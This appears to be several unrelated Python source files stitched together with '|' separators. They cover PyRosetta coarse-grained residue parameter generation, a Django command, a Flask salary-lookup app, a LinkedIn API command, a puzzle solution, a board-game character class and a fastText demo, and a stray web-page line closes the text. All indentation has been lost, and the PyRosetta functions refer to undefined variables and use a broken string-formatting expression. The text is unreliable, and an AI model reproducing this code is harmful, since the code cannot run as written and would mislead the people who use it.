cgmodel: CGModel() class object
list_of_atoms_to_add: List of atom types to write to 'mm_atom_properties.txt'
List([ strings ])
"""
mm_atom_type_sets_directory = str(str(pyrosetta_database_path)+"mm_atom_type_sets/coarse_grain")
if not os.path.exists(mm_atom_type_sets_directory): os.mkdir(mm_atom_type_sets_directory)
atom_properties_file = str(str(atom_type_sets_directory)+"/mm_atom_properties.txt")
if os.path.exists(atom_properties_file):
existing_mm_atom_types = get_existing_mm_atom_types(atom_properties_file)
file_obj = open(atom_properties_file,'a')
for atom_type in list_of_atoms_to_add:
if residue_type in existing_residue_types:
print("WARNING: found an existing atom type with the same name in:\n")
print(str(str(atom_properties_file)+"\n"))
print("Removing the existing atom type definition from 'atom_properties.txt'")
remove_existing_residue_types(file_name,[residue_type])
else:
file_obj = open(atom_properties_file,'w')
file_obj.write("NAME ATOM LJ_RADIUS LJ_WDEPTH LK_DGFREE LK_LAMBDA LK_VOLUME\n")
file_obj.write("## Coarse grained residue types to follow\n")
for atom_type in atom_type_list:
if len(atom_type) > 4:
print("ERROR: an atom type with a name longer than 4 characters has been defined for this model.\n")
print("PyRosetta syntax requires that all atom types have names with for characters or less.")
exit()
particle_type = get_particle_type(cgmodel,particle_index=-1,particle_name=atom_type)
sigma = get_sigma(cgmodel,particle_index=-1,particle_type=particle_type)
epsilon = get_epsilon(cgmodel,particle_index=-1,particle_type=particle_type)
lk_dgfree = 0.0000
lk_lambda = 3.5000
lk_volume = 0.0000
symbol = 'X'
comments = ""
line_list = [atom_type,symbol,sigma,epsilon,lk_dgfree,lk_lambda,lk_volume,comments]
line = '%4s %1s %9s %9s %9s %6s %9s %s' % (line_list[i] for i in len(line_list))
file_obj.write(line)
file_obj.close()
return
def write_atom_properties_txt(cgmodel,list_of_atoms_to_add):
"""
Given a cgmodel and a 'list_of_atoms_to_add', this functions writes the atoms to 'atom_properties.txt' in the PyRosetta database.
Parameters
----------
cgmodel: CGModel() class object
list_of_atoms_to_add: List of atom types to write to 'atom_properties.txt'
List([ strings ])
"""
atom_type_sets_directory = str(str(pyrosetta_database_path)+"atom_type_sets/coarse_grain")
if not os.path.exists(atom_type_sets_directory): os.mkdir(atom_type_sets_directory)
atom_properties_file = str(str(atom_type_sets_directory)+"/atom_properties.txt")
if os.path.exists(atom_properties_file):
existing_atom_types = get_existing_atom_types(atom_properties_file)
file_obj = open(atom_properties_file,'a')
for residue_type in residue_types_list:
if residue_type in existing_residue_types:
print("WARNING: found an existing atom type with the same name in:\n")
print(str(str(atom_properties_file)+"\n"))
print("Removing the existing atom type definition from 'atom_properties.txt'")
remove_existing_residue_types(file_name,[residue_type])
else:
file_obj = open(atom_properties_file,'w')
file_obj.write("NAME ATOM LJ_RADIUS LJ_WDEPTH LK_DGFREE LK_LAMBDA LK_VOLUME\n")
file_obj.write("## Coarse grained residue types to follow\n")
for atom_type in atom_type_list:
if len(atom_type) > 4:
print("ERROR: an atom type with a name longer than 4 characters has been defined for this model.\n")
print("PyRosetta syntax requires that all atom types have names with for characters or less.")
exit()
particle_type = get_particle_type(cgmodel,particle_index=-1,particle_name=atom_type)
sigma = get_sigma(cgmodel,particle_index=-1,particle_type=particle_type)
epsilon = get_epsilon(cgmodel,particle_index=-1,particle_type=particle_type)
lk_dgfree = 0.0000
lk_lambda = 3.5000
lk_volume = 0.0000
symbol = 'X'
comments = ""
line_list = [atom_type,symbol,sigma,epsilon,lk_dgfree,lk_lambda,lk_volume,comments]
line = '%4s %1s %9s %9s %9s %6s %9s %s' % (line_list[i] for i in len(line_list))
file_obj.write(line)
file_obj.close()
return
def build_patches(cgmodel):
"""
Builds the patch
Parameters
----------
cgmodel: CGModel() class object
particle_index: Index of the particle for which we would like to determine the type
Type: int()
Returns
-------
particle_type: 'backbone' or 'sidechain'
Type: str()
"""
residue_type_sets_directory = str(str(pyrosetta_database_path)+"residue_type_sets/coarse_grain")
if not os.path.exists(residue_type_sets_directory):
os.mkdir(residue_type_sets_directory)
if not os.path.exists(str(str(residue_type_sets_directory)+"/patches")):
os.mkdir(str(str(residue_type_sets_directory)+"/patches"))
patches_list = ['LOWER_TERMINUS_VARIANT','UPPER_TERMINUS_VARIANT']
return
def remove_existing_residue_types(residue_types_txt_file,list_of_residue_types_to_remove):
"""
Given a 'list_of_residue_types_to_remove', and a 'residue_types_txt_file', this function will open the residue types file, and remove the target residue types.
Parameters
----------
residue_types_txt_file: The path to a PyRosetta residue types file ('residue_types.txt')
list_of_residue_types_to_remove: A list of residue type names to remove from 'residue_types.txt'
"""
file_obj = open(residue_types_txt_file,'r')
lines = file_obj.readlines()
file_obj.close()
file_obj = open(residue_types_txt_file,'w')
for line in lines:
if line[0] != '#':
if '.params' in line:
residue_type = line.split('/')[-1].split('.params')[0]
if residue_type not in list_of_residue_types_to_remove:
file_obj.write(line)
file_obj.close()
return
def get_existing_residue_types(residue_types_txt_file):
"""
Given a 'residue_types_txt_file', this function gets a list of residue types that are in the file.
(Commented out lines/residue types are ignored.)
Parameters
----------
residue_types_txt_file: The path to a PyRosetta residue types fi
le ('residue_types.txt')
Returns
-------
existing_residue_types_list: A list of residue types that are currently in 'residue_types.txt'.
"""
existing_residue_types_list = []
file_obj = open(residue_types_txt_file,'r')
lines = file_obj.readlines()
for line in lines:
if line[0] != '#':
if '.params' in line:
residue_type = line.split('/')[-1].split('.params')[0]
existing_residue_types_list.append(residue_type)
return(existing_residue_types_list)
def write_residue_types_txt(residue_types_list,residue_type_sets_directory):
"""
Given a 'residue_type_sets_directory', and a 'residue_types_list', this function writes the residue types to 'residue_types.txt' (creating the file if it doesn't already exist, and appending the residue types to the file if it does exist.
Parameters
----------
residue_types_sets_directory: The path to a directory containing a list of residue types
residue_types_list: A list of residue types to write/add to 'residue_types.txt'.
"""
file_name = str(str(residue_type_sets_directory)+"residue_types.txt")
if os.path.exists(file_name):
existing_residue_types = get_existing_residue_types(file_name)
file_obj = open(file_name,'a')
file_obj.write("\n")
file_obj.write("## Coarse grained residue types to follow\n")
for residue_type in residue_types_list:
if residue_type in existing_residue_types:
print("WARNING: found an existing residue type set in the PyRosetta database folder:\n")
print(str(str(residue_type_sets_directory.split('/residue_types')[0])+"\n"))
print("with the same name as a residue you wish to add:"+str(str(residue_type)+"\n"))
print("Removing the existing residue type set's path from 'residue_type_sets.txt'")
remove_existing_residue_types(file_name,[residue_type])
else:
file_obj = open(file_name,'w')
file_obj.write("## Define atom and mm type sets\n")
file_obj.write("TYPE_SET_MODE coarse_grain\n")
file_obj.write("ATOM_TYPE_SET coarse_grain\n")
file_obj.write("ELEMENT_SET coarse_grain\n")
file_obj.write("MM_ATOM_TYPE_SET coarse_grain\n")
file_obj.write("ORBITAL_TYPE_SET coarse_grain\n")
file_obj.write("##\n")
file_obj.write("\n")
file_obj.write("## Coarse grained residue types to follow\n")
for residue_type in residue_types_list:
file_obj.write("residue_types/"+str(residue_type)+".params")
file_obj.close()
return
def build_params_files(cgmodel):
"""
Given a cgmodel class object, this function writes '.params' files for all unique residue types in the class.
Parameters
----------
cgmodel: CGModel() class object
"""
print(pyrosetta_database_path)
residue_type_sets_directory = str(str(pyrosetta_database_path)+"/chemical/residue_type_sets/coarse_grain")
if not os.path.exists(residue_type_sets_directory): os.mkdir(residue_type_sets_directory)
if not os.path.exists(str(str(residue_type_sets_directory)+"/residue_types")):
os.mkdir(str(str(residue_type_sets_directory)+"/residue_types"))
residue_code_options = ['A','B','C','D','E','F']
residue_code_list = []
residue_code_index = 0
residue_code = residue_code_options[residue_code_index]
for residue in cgmodel.monomer_types:
residue_type_name = str("CG"+str(residue['backbone_length'])+str(residue['sidechain_length']))
while residue_code in residue_code_list:
residue_code_index = residue_code_index + 1
residue_code = residue_code_options[residue_code_index]
file_name = str(str(residue_code)+".param")
file_obj = open(file_name,'w')
file_obj.write("# Rosetta residue topology file\n")
file_obj.write("# Authors: Lenny T. Fobe, Garrett A. Meek\n")
file_obj.write("# ( Research group of Professor Michael R. Shirts )\n")
file_obj.write("# Dept. of Chemical and Biological Engineering\n")
file_obj.write("# University of Colorado Boulder\n")
file_obj.write("# This file was written on: "+str(datetime.datetime.today())+"\n")
file_obj.write("\n")
file_obj.write("NAME "+str(residue_type_name)+"\n")
file_obj.write("IO_STRING "+str(residue_type_name)+" "+str(residue_code)+"\n")
file_obj.write("TYPE POLYMER\n")
file_obj.write("\n")
file_obj.write(str("VARIANT\n"))
file_obj.write("\n")
for backbone_bead in range(residue['backbone_length']):
atom_name = str("BB"+str(backbone_bead+1))
file_obj.write("ATOM "+str(atom_name)+" VIRT X 0.0\n")
if backbone_bead in [residue['sidechain_positions']]:
for sidechain_bead in range(residue['sidechain_length']):
atom_name = str("SC"+str(sidechain_bead+1))
file_obj.write("ATOM "+str(atom_name)+" VIRT X 0.0\n")
if residue['sidechain_length'] == 1:
file_obj.write("ATOM VIRT VIRT X 0.0\n")
file_obj.write("\n")
upper_connect = str("BB"+str(residue['backbone_length']))
file_obj.write("LOWER CONNECT BB1\n")
file_obj.write("UPPER_CONNECT "+str(upper_connect)+"\n")
atom_1_name = str("BB1")
for backbone_bead in range(residue['backbone_length']):
if backbone_bead != 0:
atom_2_name = str("BB"+str(backbone_bead+1))
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = atom_2_name
if backbone_bead in [residue['sidechain_positions']]:
for sidechain_bead in range(residue['sidechain_length']):
atom_2_name = str("SC"+str(sidechain_bead+1))
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = atom_2_name
if residue['sidechain_length'] == 1:
atom_2_name = str("VIRT")
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = str("BB"+str(backbone_bead+1))
file_obj.write("\n")
file_obj.write("FIRST_SIDECHAIN_ATOM SC1\n")
file_obj.write("PROPERTIES\n")
file_obj.write("\n")
file_obj.close()
shutil.move(file_name,str(str(residue_type_sets_directory)+"/residue_types/"+str(file_name)))
write_residue_types_txt(residue_code_list,residue_type_sets_directory)
return
def build_scorefxn(cgmodel):
"""
Given a cgmodel class object, this function uses its definitions to build a PyRosetta scoring function.
(Used to confirm energetic agreement between PyRosetta and OpenMM for identical model parameters and an identical structural ensemble.)
Parameters
----------
cgmodel: CGModel() class object
Returns
-------
scorefxn: A PyRosetta ScoreFunction() class object, containing all scoring function components that are defined/requested within the cgmodel() class object.
"""
scorefxn = pyrosetta.ScoreFunction()
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_atr, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_rep, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_intra_atr, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_intra_rep, 1)
cg_pyrosetta.change_parameters.changeTorsionParameters(
{'CG1 CG1 CG1 CG1':[3,3,0],
'CG2 CG1 CG1 CG2':[0,0,0],
'CG2 CG1 CG1 CG1':[0,0,0],
'X CG2 CG1 CG1':[0,0,0]},
)
cg_pyrosetta.change_parameters.changeAngleParameters(
{'CG1 CG1 CG1':[2,120],
'CG2 CG1 CG1':[2,120],
'CG1 CG1 CG2':[0,0],
'X CG2 CG1':[0,0]}
)
# scorefxn.set_weight(pyrosetta.rosetta.core.scoring.mm_twist, 0.1)
return(scorefxn)
def compare_pose_scores(scorefxn,pose_1,pose_2,compare_pdb_sequence=True):
"""
Given two PyRosetta poses ('pose_1' and 'pose_2') and a scoring function ('scorefxn'), this function compares their scores to confirm agreement.
(Can also be used to confirm that the scores for poses generated from the sequence and from a PDB file are identical, in order to validate our procedure for building PyRosetta '.params' files from the cgmodel class object.)
Parameters
----------
scorefxn: A PyRosetta scoring function
pose_1: A PyRosetta pose (The pose built from a PDB file if 'compare_pdb'=True)
pose_2: A PyRosetta pose (The pose build from a sequence if 'compare_pdb'=True)
compare_pdb_sequence: A logical variable determining whether this score comparison is meant to determine agreement between poses built from a PDB file and a sequence.
"""
if compare_pdb_sequence:
pdb_score = scorefxn.show(pose_1)
sequence_score = scorefxn.show(pose_2)
if sequence_score != pdb_score:
print("WARNING: Getting different scores when the pose is built from a sequence and from a PDB file.\n")
print("The score when building a pose from the sequence is: "+str(sequence_score)+"\n")
print("The score when building a pose from the PDB file is: "+str(pdb_score)+"\n")
else:
print("The scores are identical when a pose is built from a PDB file and from the polymer sequence.\n")
else:
score_1 = scorefxn.show(pose_1)
score_2 = scorefxn.show(pose_2)
if score_1 != score_2:
print("The scores for these poses are different:\n")
print("The score for pose 1 is:"+str(score_1)+"\n")
print("The score for pose 2 is:"+str(score_2)+"\n")
else:
print("The scores for these poses are the same.\n")
return
def compare_openmm_energy_pyrosetta_score(cgmodel):
"""
Given a cgmodel class object, this function determines if PyRosetta and OpenMM give the same score/energy with identical model settings.
Parameters
----------
cgmodel: Coarse grained model class object.
"""
#build_params_files(cgmodel)
pyrosetta.init()
pyrosetta_sequence = ''.join([str('X['+str(monomer['monomer_name'])+']') for monomer in cgmodel.sequence])
# Build a PyRosetta pose
pose = pyrosetta.pose_from_sequence(pyrosetta_sequence)
# Define a PyRosetta scoring function
pose.dump_pdb("test_pyrosetta.pdb")
scorefxn = build_scorefxn(cgmodel)
cgmodel.positions = PDBFile("test_pyrosetta.pdb").getPositions()
cgmodel.topology = build_topology(cgmodel)
write_pdbfile_without_topology(cgmodel,"test_foldamers.pdb")
# get the PyRosetta score
score = scorefxn(pose)
# Build an OpenMM simulation object so that we can calculate the energy using a simulation Context()
temperature = 300.0 * unit.kelvin
simulation = build_mm_simulation(cgmodel.topology,cgmodel.system,cgmodel.positions,temperature=temperature,simulation_time_step=5.0 * unit.femtosecond)
# Obtain a state for our simulation context
energy = simulation.context.getState(getEnergy=True).getPotentialEnergy()
print("The PyRosetta score is: "+str(score)+"\n")
print("The OpenMM potential energy is: "+str(energy)+"\n")
return
# Set values for the parameters in our coarse grained model:
polymer_length=12
backbone_lengths=[1]
sidechain_lengths=[1]
sidechain_positions=[0]
include_bond_forces=False
include_bond_angle_forces=True
include_nonbonded_forces=True
include_torsion_forces=True
constrain_bonds=True
# Particle properties
mass = 100.0 * unit.amu
masses = {'backbone_bead_masses': mass, 'sidechain_bead_masses': mass}
bond_length = 1.0 * unit.angstrom
bond_lengths = {'bb_bb_bond_length': bond_length,'bb_sc_bond_length': bond_length,'sc_sc_bond_length': bond_length}
bond_force_constant = 0.0 * unit.kilocalorie_per_mole / unit.nanometer / unit.nanometer
bond_force_constants = {'bb_bb_bond_k': bond_force_constant, 'bb_sc_bond_k': bond_force_constant, 'sc_sc_bond_k': bond_force_constant}
sigma = 1.0 * bond_length
sigmas = {'bb_bb_sigma': sigma,'sc_sc_sigma': sigma}
epsilon = 0.2 * unit.kilocalorie_per_mole
epsilons = {'bb_bb_eps': epsilon,'sc_sc_eps': epsilon}
# Bond angle properties
bond_angle_force_constant = 2 * unit.kilocalorie_per_mole / unit.radian / unit.radian
bond_angle_force_constants = {'bb_bb_bb_angle_k': bond_angle_force_constant,'bb_bb_sc_angle_k': bond_angle_force_constant}
equil_bond_angle = 120.0*(3.141/180.0)
equil_bond_angles = {'bb_bb_bb_angle_0': equil_bond_angle,'bb_bb_sc_angle_0': equil_bond_angle}
# Torsion properties
torsion_force_constant = 3
torsion_force_constants = {'bb_bb_bb_bb_torsion_k': torsion_force_constant,'sc_bb_bb_sc_torsion_k': 0.0,'bb_bb_bb_sc_torsion_k': 0.0,'sc_bb_bb_bb_torsion_k': 0.0}
equil_torsion_angle = 0.0*(3.141/180.0)
equil_torsion_angles = {'bb_bb_bb_bb_torsion_0': equil_torsion_angle,'sc_bb_bb_sc_torsion_0': 0.0,'bb_bb_bb_sc_torsion_0': 0.0,'sc_bb_bb_bb_torsion_0': 0.0}
#Adjust the nonbonded exclusion rules and interaction weights to match the Rosetta scoring function
rosetta_scoring = True
# Build a coarse grained model
cgmodel = CGModel(polymer_length=polymer_length,backbone_lengths=backbone_lengths,sidechain_lengths=sidechain_lengths,sidechain_positions=sidechain_positions,masses=masses,sigmas=sigmas,epsilons=epsilons,bond_lengths=bond_lengths,bond_force_constants=bond_force_constants,bond_angle_force_constants=bond_angle_force_constants,torsion_force_constants=torsion_force_constants,equil_bond_angles=equil_bond_angles,equil_torsion_angles=equil_torsion_angles,include_nonbonded_forces=include_nonbonded_forces,include_bond_forces=include_bond_forces,include_bond_angle_forces=include_bond_angle_forces,include_torsion_forces=include_torsion_forces,constrain_bonds=constrain_bonds,rosetta_scoring=rosetta_scoring)
# Compare OpenMM and PyRosetta energies
# (This function is also where we initialize new residue/monomer
# types in the PyRosetta database.)
compare_openmm_energy_pyrosetta_score(cgmodel)
# Test our ability to write a PDB file using our pose and new residue type sets.
exit()
|
from django.core.management.base import BaseCommand
from data_refinery_common.models import ComputationalResultAnnotation, Experiment
class Command(BaseCommand):
def handle(self, *args, **options):
organism_ids = list(
ComputationalResultAnnotation.objects.filter(data__is_qn=True).values_list(
"data__organism_id", flat=True
)
)
for experiment in Experiment.objects.all():
experiment.num_downloadable_samples = experiment.samples.filter(
is_processed=True, organism__id__in=organism_ids
).count()
experiment.save()
print("Updated the num_downloadable_samples field on all experiment objects.")
|
from flask import Flask, render_template, request
from sqlalchemy import Column, Integer, String, Float, create_engine, ForeignKey, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import requests
app = Flask(__name__)
@app.route('/')
@app.route('/main')
def main():
return render_template('main.html')
@app.route('/contacts')
def contacts():
return render_template('contacts.html')
@app.route('/city_form', methods=['POST'])
def city_form():
city = request.form['city']
prof = request.form['prof']
string = prof + 'AND' + city
URL = 'https://api.hh.ru/vacancies'
params = {'text': string,
'only_with_salary': True,
'page': 1,
'per_page': 20}
result = requests.get(URL, params=params).json()
found_vacancies = result['found']
pages = result['pages']
salary_from = []
salary_to = []
print('найдено вакансий {} штук на {} страницах'.format(result['found'], result['pages']))
for i in range(1, pages):
URL = 'https://api.hh.ru/vacancies'
params = {'text': string,
'only_with_salary': True,
'page': i,
'per_page': 20}
result = requests.get(URL, params=params).json()
items = result['items']
for i in items:
salary = i['salary']
sal_from = salary['from']
sal_to = salary['to']
if sal_from != None: salary_from.append(sal_from)
if sal_to != None: salary_to.append(sal_to)
salary_from = int(sum(salary_from) / len(salary_from))
salary_to = int(sum(salary_to) / len(salary_to))
data = {'city': city,
'prof': prof,
'salary_from': salary_from,
'salary_to': salary_to}
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
class HH_request(Base):
__tablename__ = 'HH_request_new'
id = Column(Integer, primary_key=True)
city = Column(String)
prof = Column(String)
salary_from = Column(Integer)
salary_to = Column(Integer)
def __init__(self, city, prof, salary_from, salary_to):
self.city = city
self.prof = prof
self.salary_from = salary_from
self.salary_to = salary_to
def __str__(self):
return f'{self.city},{self.prof},{self.salary_from},{self.salary_to}'
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
HH_request_1 = HH_request(city, prof, salary_from, salary_to)
session.add(HH_request_1)
session.commit()
return render_template('city_form.html', data=data)
@app.route('/hands_to_db')
def hands_to_db():
return render_template('hands_to_db.html')
@app.route('/hands_to_db_rec', methods=['POST'])
def hands_to_db_rec():
city_hotelka = request.form['City']
prof_hotelka = request.form['Prof']
salary_from_hotelka = request.form['Salary_from']
salary_to_hotelka = request.form['Salary_to']
data = {'city': city_hotelka,
'prof': prof_hotelka,
'salary_from': salary_from_hotelka,
'salary_to': salary_to_hotelka}
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
class HH_hotelka(Base):
__tablename__ = 'HH_hotelka'
id = Column(Integer, primary_key=True)
city_hotelka = Column(String)
prof_hotelka = Column(String)
salary_from_hotelka = Column(Integer)
salary_to_hotelka = Column(Integer)
def __init__(self, city_hotelka, prof_hotelka, salary_from_hotelka, salary_to_hotelka):
self.city_hotelka = city_hotelka
self.prof_hotelka = prof_hotelka
self.salary_from_hotelka = salary_from_hotelka
self.salary_to_hotelka = salary_to_hotelka
def __str__(self):
return f'{self.city_hotelka},{self.prof_hotelka},{self.salary_from_hotelka},{self.salary_to_hotelka}'
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
HH_hotelka_1 = HH_hotelka(city_hotelka, prof_hotelka, salary_from_hotelka, salary_to_hotelka)
session.add(HH_hotelka_1)
session.commit()
return render_template('hands_to_db_rec.html', data=data)
if __name__ == "__main__":
app.run(debug=True)
|
import json
import linkedin.commands.command as command
import linkedin.utils.config as config
import logging
from urllib import request
logger = logging.getLogger(__name__)
class HelpCommand(command.BaseCommand):
def execute(self, args):
print("usage: linkedin me")
class MeCommand(command.BaseCommand):
def execute(self, args):
url = "https://api.linkedin.com/v2/me"
req = request.Request(url, headers={'Authorization': 'Bearer ' + config.getConfig().CONFIG['access_token']})
response = request.urlopen(req)
user = json.loads(response.read())
print("ID: " + user["id"],)
print("First Name: " + user['localizedFirstName'])
print("Last Name: " + user['localizedLastName'])
|
"""Program takes 3 variables as inputs I.E. Number of test cases Number of People and The cost array in the given order respectively"""
no_of_test_cases=int(input())
for _ in range(no_of_test_cases):
no_of_people=int(input())
cost_list=list(map(int,input().split()))
cost_list.sort()
cost=0
while(no_of_people>3):
""" As seen in the sample test cases, either the lowest costing person can make 2 round trips with the highest costing people
or the 2 lowest costing people can go first followed by the lowest costing person returning and then the 2 highest costing person going
to the temple and the second lowest person returning, whichever is the lowest among these 2(As seen in 1st and 4th test case)"""
#2*cost_list[0]+cost_list[no_of_people-1]+cost_list[no_of_people-2] for when the lowest cost returns twice
#cost_list[0]+2*cost_list[1]+cost_list[no_of_people-1] for when the 2 of the lowest go first and then each one retuns starting with the lowest
#this can also be done by checking if the lowest cost+ second highest cost is greater or lesser than 2 times 2nd lowest cost
cost+=min((2*cost_list[0]+cost_list[no_of_people-1]+cost_list[no_of_people-2]),(cost_list[0]+2*cost_list[1]+cost_list[no_of_people-1]))
"""Loop will run until there are less than 3 people left to go to the temple, reducing the length of the list by 2 each time the above method
is repeated"""
no_of_people-=2
if(no_of_people==3):
#cost of 3 people can be seen as the highest and lowest going, the lowest returning then the second highest and lowest going, that is the sum of thier costs
cost+=cost_list[0]+cost_list[1]+cost_list[2]
elif(no_of_people==2):
#whichever of the two is higher should be added to the cost
cost+=cost_list[1]
else:
cost+=cost_list[0]
print(cost)
|
"""Contains the Courtier Character class"""
import json
from botc import Character, Townsfolk
from ._utils import BadMoonRising, BMRRole
with open('botc/gamemodes/badmoonrising/character_text.json') as json_file:
character_text = json.load(json_file)[BMRRole.courtier.value.lower()]
class Courtier(Townsfolk, BadMoonRising, Character):
"""Courtier: Once per game, at night, choose a character: they are drunk for 3 nights & 3 days.
"""
def __init__(self):
Character.__init__(self)
BadMoonRising.__init__(self)
Townsfolk.__init__(self)
self._desc_string = character_text["description"]
self._examp_string = character_text["examples"]
self._instr_string = character_text["instruction"]
self._lore_string = character_text["lore"]
self._brief_string = character_text["brief"]
self._action = character_text["action"]
self._art_link = "https://bloodontheclocktower.com/wiki/images/7/7d/Courtier_Token.png"
self._art_link_cropped = "https://imgur.com/c1wt8jB.png"
self._wiki_link = "https://bloodontheclocktower.com/wiki/Courtier"
self._role_enum = BMRRole.courtier
self._emoji = "<:bmrcourtier:781151556128342058>"
|
import fasttext as ft
# Fist download the dbpedia.train using https://github.com/facebookresearch/fastText/blob/master/classification-example.sh
# on test/ and move to the example directory
current_dir = path.dirname(__file__)
input_file = path.join(current_dir, 'dbpedia.train')
output = '/tmp/classifier'
test_file = '../test/classifier_test.txt'
# set params
dim=10
lr=0.005
epoch=1
min_count=1
word_ngrams=3
bucket=2000000
thread=4
silent=1
label_prefix='__label__'
# Train the classifier
classifier = ft.supervised(input_file, output, dim=dim, lr=lr, epoch=epoch,
min_count=min_count, word_ngrams=word_ngrams, bucket=bucket,
thread=thread, silent=silent, label_prefix=label_prefix)
# Test the classifier
result = classifier.test(test_file)
print 'P@1:', result.precision
print 'R@1:', result.recall
print 'Number of examples:', result.nexamples
# Predict some text
# (Example text is from dbpedia.train)
texts = ['birchas chaim , yeshiva birchas chaim is a orthodox jewish mesivta \
high school in lakewood township new jersey . it was founded by rabbi \
shmuel zalmen stein in 2001 after his father rabbi chaim stein asked \
him to open a branch of telshe yeshiva in lakewood . as of the 2009-10 \
school year the school had an enrollment of 76 students and 6 . 6 \
classroom teachers ( on a fte basis ) for a student–teacher ratio of \
11 . 5 1 .']
labels = classifier.predict(texts)
print labels
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.